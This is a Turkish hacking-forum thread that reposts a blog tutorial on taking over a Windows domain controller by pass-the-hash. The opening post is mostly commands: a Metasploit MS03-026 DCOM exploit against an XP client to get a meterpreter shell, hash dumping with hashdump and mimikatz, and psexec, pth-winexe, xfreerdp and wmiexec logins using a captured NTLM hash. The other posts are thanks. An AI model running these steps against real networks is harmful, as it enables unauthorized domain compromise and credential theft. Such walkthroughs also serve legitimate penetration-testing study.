THT DUYURU

chat
Yayınlar Siber güvenlik ile alakalı dergi ve kitapların, telif haklarını göz önünde bulundurularak paylaşım ve duyurularının yapılması.

takipci
chat
Seçenekler

## Pass The Hass Saldırısı ile Domain Ele Geçirme ##

MwTugi - ait Kullanıcı Resmi (Avatar)
İstihbaratçı
Üyelik tarihi:
05/2016
Nereden:
Nereye !
Yaş:
5
Mesajlar:
4.880
Konular:
376
Teşekkür (Etti):
330
Teşekkür (Aldı):
1607
Ticaret:
(0) %
14
4523
21-11-2017 12:51
#1
## Pass The Hass Saldırısı ile Domain Ele Geçirme ##
Pass the Hash Saldırısı ile Domain'i Ele Geçirme

Bir networkte birden fazla client bulunduğunda domain server kurulur. Bu server üzerinde gerekli politikalar oluşturularak kullanıcı oluşturulur. Daha sonra client’lar bilgisayarlarını açmak istediklerinde active directory’deki credential bilgileri ile bilgisayarlarını açarlar.

Biz burada client üzerinde bulunan parola hash’lerini alarak domain server'ı ele geçireceğiz. Kullanıcı hem client’ta hem de server üzerinde çalışabilen bir kullanıcı olmalıdır.




Client Windows XP SP1 çalışan bir cihaz ve serverda Windows Server 2008 r2 işletim sistemlerine sahiptirler. Client active directory’yi kullanarak login olmaktadır. Xp üzerinde “MS03-026 dcom” açıklığı bulunmaktadır. Bu açıklık yardımıyla parola hashlerini çekeceğiz.
Kod:
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST 192.168.2.133
RHOST => 192.168.2.133
msf exploit(ms03_026_dcom) > set RPORT 135
RPORT => 135
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > run



"run" denilip meterpreter shell açıldıktan sonra ram üzerinde bilgileri çekmemiz gerekmektedir. Meterpreterda "hashdump" yazdığımızda, SAM dosyasındaki bilgileri vermektedir. Bu bizim için yeterli olmayacaktır. Bundan dolayı mimikatz aracını kullanarak aktif olan kullanıcıyıda görüntüleyebileceğiz.

Saldıracağımız kullanıcı "BTRISKLOCAL administrator" olacaktır. Bu kullanıcı hem clientta(XP de), hem de server(Windows Server 2008) de login olabilen bir kullanıcıdır. Bu kullanıcı ile sunucuyu ele geçireceğiz.

Doğru domain bilgilerini öğrenebilmemiz için nmap aracını kullanabilirsiniz.
[/COLOR]

Kod:
nmap -p 445 --script smb-os-discovery 192.168.2.5
[IMG]
https://3.bp.blogspot.com/-Nd72Iw1qtlE/WKGwXicvbaI/AAAAAAAAA7s/qnV2zDYLEMgdZ-wAnzUH45K0J4kfwYr8wCPcB/s1600/Pass%2Bthe%2BHash%2BSald%25C4%25B1r%25C4%25B1s%25C 4%25B1%2B%25C4%25B0le%2BDomain%2BServere%2BDahil%2 BOlma-3.jpg[/IMG]

use exploit/windows/smb/psexec modulunu kullanarak servera login olunabilmektedir.
Kod:
msf >  use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.2.5
RHOST => 192.168.2.5
msf >  use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.2.5
RHOST => 192.168.2.5
msf exploit(psexec) > set SMBUser administrator
SMBUser => administrator 
msf exploit(psexec) > set SMBPass f26fb3ae03e93ab9c81667e9d738c5d9:47bf8039a8506cd67c524a03ff84ba4e
SMBPass => f26fb3ae03e93ab9c81667e9d738c5d9:47bf8039a8506cd67c524a03ff84ba4e
msf exploit(psexec) > set SMBDomain btrisklocal
SMBDomain => btrisklocal
msf exploit(psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.184.131
LHOST => 192.168.184.131
msf exploit(psexec) > run
Gerekli bilgileri girildiğinden emin olun.



Show options dediğimizde ayarlar asadaki şekilde olacaktır.



Run diyerek giriş yapıyoruz



****sploit kullanmadan da bu işlemleri yapabilirsiniz. Bunun içinde pth-winexe, freerdp-x11, wmiexec.exe(Windowsda) vb. araçlar kullanılabilir. Bu araçlar da aynı mantıkla çalışmaktadır.

Kod:
#pth-winece Kullanımı
pth-winexe -U DOMAIN/username%hash //IP cmd.exe
pth-winexe -U btrisklocal/administrator%f26fb3ae03e93ab9c81667e9d738c5d9:47bf8039a8506cd67c524a03ff84ba4e //192.168.2.5 cmd.exe

#freerdp-x11 Kullanımı
xfreerdp /u:username /d:DOMAIN /ptn:hash /v:IP

#Windowsda kullanabileceğiniz wmiexec
.\wmiexec.exe -hashes HASH username@IP
Bulduğunuz hash'i decrypter araçları ile çözerek elde edilen parola ile başka sistemlere authentication uygulanabilir. Belki daha yetkili sistemlere giriş yapmaya izin verebilir


Alıntıdır
Kaynak; BTRiskBlog Pentest, ISO27001 ve BT Denetimi Hakkında Herşey
Gerçekten yararlı bilgiler paylaşılan ve takip ettiğim bir blog tavsiye ederim
---------------------
Düşme!
Düşersen, bağımsızlığını ilan eder dostların,
Düşünce, bütün düşüncelerin değişir hayata dair.
Yılanın ne kadar masum, kurdun suçsuz, çakalın çakal olmadığını anlarsın iki yüzlü insanları görünce
,
Düşme!

10'uncu Köyden!
Konu MwTugi tarafından (22-11-2017 17:20 Saat 17:20 ) değiştirilmiştir.
iscorpix - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Mesajlar:
4.382
Konular:
538
Teşekkür (Etti):
815
Teşekkür (Aldı):
1170
Ticaret:
(0) %
21-11-2017 12:58
#2
Emeğinize sağlık komutanım
MwTugi - ait Kullanıcı Resmi (Avatar)
İstihbaratçı
Üyelik tarihi:
05/2016
Nereden:
Nereye !
Yaş:
5
Mesajlar:
4.880
Konular:
376
Teşekkür (Etti):
330
Teşekkür (Aldı):
1607
Ticaret:
(0) %
21-11-2017 15:56
#3
Alıntı:
iscorpix´isimli üyeden Alıntı Mesajı göster
Emeğinize sağlık komutanım
Eyvallah
---------------------
Düşme!
Düşersen, bağımsızlığını ilan eder dostların,
Düşünce, bütün düşüncelerin değişir hayata dair.
Yılanın ne kadar masum, kurdun suçsuz, çakalın çakal olmadığını anlarsın iki yüzlü insanları görünce
,
Düşme!

10'uncu Köyden!
Ultra723 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2013
Nereden:
sitemap.xml
Yaş:
10
Mesajlar:
2.715
Konular:
555
Teşekkür (Etti):
241
Teşekkür (Aldı):
504
Ticaret:
(0) %
21-11-2017 16:23
#4
Bu guzel bilgi paylasimi icin tesekkurler
---------------------
к. αтαтüяк

---> “Para ya da mal çaldığınızda birileri onun kaybolduğunu anlarlar. Bilgi çaldığınızda çoğu zaman bunu kimse fark etmez, çünkü bilgi hâlâ ellerindedir.”


- Kevin Mitnick


A8Yxqrk=+K+5
MwTugi - ait Kullanıcı Resmi (Avatar)
İstihbaratçı
Üyelik tarihi:
05/2016
Nereden:
Nereye !
Yaş:
5
Mesajlar:
4.880
Konular:
376
Teşekkür (Etti):
330
Teşekkür (Aldı):
1607
Ticaret:
(0) %
22-11-2017 17:20
#5
Alıntı:
Ultra723´isimli üyeden Alıntı Mesajı göster
Bu guzel bilgi paylasimi icin tesekkurler
Rica Ederim (:
---------------------
Düşme!
Düşersen, bağımsızlığını ilan eder dostların,
Düşünce, bütün düşüncelerin değişir hayata dair.
Yılanın ne kadar masum, kurdun suçsuz, çakalın çakal olmadığını anlarsın iki yüzlü insanları görünce
,
Düşme!

10'uncu Köyden!
JonnieBrofer - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
1.437
Konular:
81
Teşekkür (Etti):
104
Teşekkür (Aldı):
155
Ticaret:
(0) %
22-11-2017 17:21
#6
Eline sağlık .
---------------------

Turkhackteam.org / JonnieBrofer

© \\1923// JonnieBrofer ALL RIGHTS RESERVED
█║▌│█│║▌║█║▌│█│║
MUSTAFA KEMAL ATATÜRK
NE MUTLU TÜRK'ÜM DİYENE
█║▌│█│║▌║█║▌│█│║
MwTugi - ait Kullanıcı Resmi (Avatar)
İstihbaratçı
Üyelik tarihi:
05/2016
Nereden:
Nereye !
Yaş:
5
Mesajlar:
4.880
Konular:
376
Teşekkür (Etti):
330
Teşekkür (Aldı):
1607
Ticaret:
(0) %
23-11-2017 18:06
#7
Alıntı:
JonnieBrofer´isimli üyeden Alıntı Mesajı göster
Eline sağlık .
Eyvallah
---------------------
Düşme!
Düşersen, bağımsızlığını ilan eder dostların,
Düşünce, bütün düşüncelerin değişir hayata dair.
Yılanın ne kadar masum, kurdun suçsuz, çakalın çakal olmadığını anlarsın iki yüzlü insanları görünce
,
Düşme!

10'uncu Köyden!
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.281
Konular:
319
Teşekkür (Etti):
505
Teşekkür (Aldı):
1319
Ticaret:
(0) %
23-11-2017 18:16
#8
Ellerine sağlık.
King Kong - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
2.397
Konular:
153
Teşekkür (Etti):
156
Teşekkür (Aldı):
423
Ticaret:
(0) %
23-11-2017 18:36
#9
Ellerine Sağlık Süper Konu Bilmediğim Birşey Ve Detaylı Anlatım Efsane...
LifeHacker - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Mesajlar:
859
Konular:
117
Teşekkür (Etti):
135
Teşekkür (Aldı):
118
Ticaret:
(0) %
24-11-2017 22:35
#10
Gene döktürmüşsün (:
---------------------
"Bir millet eğitim ordusuna sahip olmadıkça, savaş meydanlarında ne kadar parlak zaferler elde ederse etsin, o zaferlerin kalıcı sonuçlar vermesi ancak eğitim ordusuyla mümkündür."

M.KEMAL ATATÜRK

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler